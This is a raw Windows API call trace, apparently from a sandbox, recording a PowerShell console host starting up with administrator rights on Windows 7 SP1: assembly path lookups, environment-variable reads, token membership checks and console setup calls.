	[0762.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0762.247] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0762.247] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.247] CoTaskMemFree (pv=0x3cee00) 
	[0763.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0763.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22da30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0763.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22da30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0764.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x22da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0764.455] SetErrorMode (uMode=0x1) returned 0x1
	[0764.456] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x22dc80 | out: lpFileInformation=0x22dc80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0765.714] SetErrorMode (uMode=0x1) returned 0x1
	[0786.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0786.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22da30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0786.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22da30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0786.578] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0786.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0786.578] CoTaskMemFree (pv=0x3cee00) 
	[0786.581] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0786.581] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0786.581] CoTaskMemFree (pv=0x3cee00) 
	[0786.582] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0786.582] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0786.582] CoTaskMemFree (pv=0x3cee00) 
	[0786.585] CoCreateGuid (in: pguid=0x22e048 | out: pguid=0x22e048*(Data1=0xf3089a14, Data2=0xd870, Data3=0x4cc1, Data4=([0]=0x9c, [1]=0x18, [2]=0x51, [3]=0x0, [4]=0xa2, [5]=0x97, [6]=0x7b, [7]=0x90))) returned 0x0
	[0787.524] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0787.524] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0787.524] CoTaskMemFree (pv=0x3cee00) 
	[0787.527] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0787.527] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0787.527] CoTaskMemFree (pv=0x3cee00) 
	[0787.529] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0787.529] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0787.530] CoTaskMemFree (pv=0x3cee00) 
	[0787.663] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0788.678] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x22dcf0 | out: lpConsoleScreenBufferInfo=0x22dcf0) returned 1
	[0788.701] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0788.701] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x22dcf0 | out: lpConsoleScreenBufferInfo=0x22dcf0) returned 1
	[0788.702] GetVersionExW (in: lpVersionInformation=0x22dc80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22dc80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0788.705] GetCurrentProcess () returned 0xffffffffffffffff
	[0788.706] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x22dd18 | out: TokenHandle=0x22dd18*=0x2f4) returned 1
	[0788.711] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22dc38 | out: TokenInformation=0x0, ReturnLength=0x22dc38) returned 0
	[0788.712] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3d7290
	[0788.712] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0x8, TokenInformation=0x3d7290, TokenInformationLength=0x4, ReturnLength=0x22dc38 | out: TokenInformation=0x3d7290, ReturnLength=0x22dc38) returned 1
	[0788.714] DuplicateTokenEx (in: hExistingToken=0x2f4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x22dd98 | out: phNewToken=0x22dd98*=0x2f0) returned 1
	[0788.714] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22dc38 | out: TokenInformation=0x0, ReturnLength=0x22dc38) returned 0
	[0788.714] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3d72c0
	[0788.714] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0x8, TokenInformation=0x3d72c0, TokenInformationLength=0x4, ReturnLength=0x22dc38 | out: TokenInformation=0x3d72c0, ReturnLength=0x22dc38) returned 1
	[0788.715] CheckTokenMembership (in: TokenHandle=0x2f0, SidToCheck=0x2db8070*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x22dda8 | out: IsMember=0x22dda8) returned 1
	[0788.715] CloseHandle (hObject=0x2f0) returned 1
	[0788.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0788.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0788.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0788.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0790.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0790.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0790.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0790.757] CoTaskMemAlloc (cb=0x804) returned 0x1b9e5210
	[0790.757] GetConsoleTitleW (in: lpConsoleTitle=0x1b9e5210, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0790.758] CoTaskMemFree (pv=0x1b9e5210) 
	[0790.789] CoTaskMemAlloc (cb=0x804) returned 0x1b9e8270
	[0790.789] GetConsoleTitleW (in: lpConsoleTitle=0x1b9e8270, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0790.789] CoTaskMemFree (pv=0x1b9e8270) 
	[0790.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0790.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0790.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0790.792] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0790.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0790.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0790.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0790.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0791.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0791.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0791.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0791.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0791.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0791.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0791.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0791.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0791.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0791.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0796.592] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x214
	[0796.594] CoCreateGuid (in: pguid=0x22de90 | out: pguid=0x22de90*(Data1=0x22bde736, Data2=0x736b, Data3=0x441f, Data4=([0]=0x96, [1]=0x69, [2]=0xac, [3]=0xf4, [4]=0xec, [5]=0x4c, [6]=0x59, [7]=0x97))) returned 0x0
	[0796.596] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0796.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0796.596] CoTaskMemFree (pv=0x3cee00) 
	[0797.637] WinSqmIsOptedIn () returned 0x0
	[0797.637] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0797.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0797.637] CoTaskMemFree (pv=0x3cee00) 
	[0797.638] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0797.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0797.638] CoTaskMemFree (pv=0x3cee00) 
	[0797.639] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0797.639] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0797.639] CoTaskMemFree (pv=0x3cee00) 
	[0797.639] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0797.639] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0797.640] CoTaskMemFree (pv=0x3cee00) 
	[0797.640] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0797.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0797.640] CoTaskMemFree (pv=0x3cee00) 
	[0797.641] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0797.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0797.642] CoTaskMemFree (pv=0x3cee00) 
	[0797.642] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0797.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0797.642] CoTaskMemFree (pv=0x3cee00) 
	[0797.643] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0797.643] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0797.643] CoTaskMemFree (pv=0x3cee00) 
	[0798.610] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0798.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.611] CoTaskMemFree (pv=0x3cee00) 
	[0798.631] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0798.631] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.631] CoTaskMemFree (pv=0x3cee00) 
	[0798.633] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0798.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.633] CoTaskMemFree (pv=0x3cee00) 
	[0798.633] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0798.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.633] CoTaskMemFree (pv=0x3cee00) 
	[0807.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0807.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0807.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0807.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
